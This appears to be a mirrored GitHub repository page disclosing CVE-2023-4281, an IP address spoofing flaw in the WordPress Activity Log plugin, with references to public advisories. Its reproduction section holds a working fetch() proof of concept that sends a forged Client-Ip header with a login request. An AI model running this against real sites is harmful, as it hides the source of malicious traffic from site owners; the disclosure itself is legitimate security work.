Giters

b0marek / CVE-2023-4281

Repository for CVE-2023-4281 vulnerability.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE ID: CVE-2023-4281

Vulnerability Type: IP Address Spoofing

Description: The Activity Log plugin retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.

Steps to reproduce:

Run the following code in the web browser and note on the backend that the IP address has been faked.

await fetch("/wp-login.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
    "Client-Ip": "8.8.8.8",
  },
  "body": "log=USERNAME&pwd=PASSWORD",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

Reference:

  1. https://wpscan.com/vulnerability/f5ea6c8a-6b07-4263-a1be-dd033f078d49
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4281
  3. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/aryo-activity-log/activity-log-287-ip-address-spoofing

About

Repository for CVE-2023-4281 vulnerability.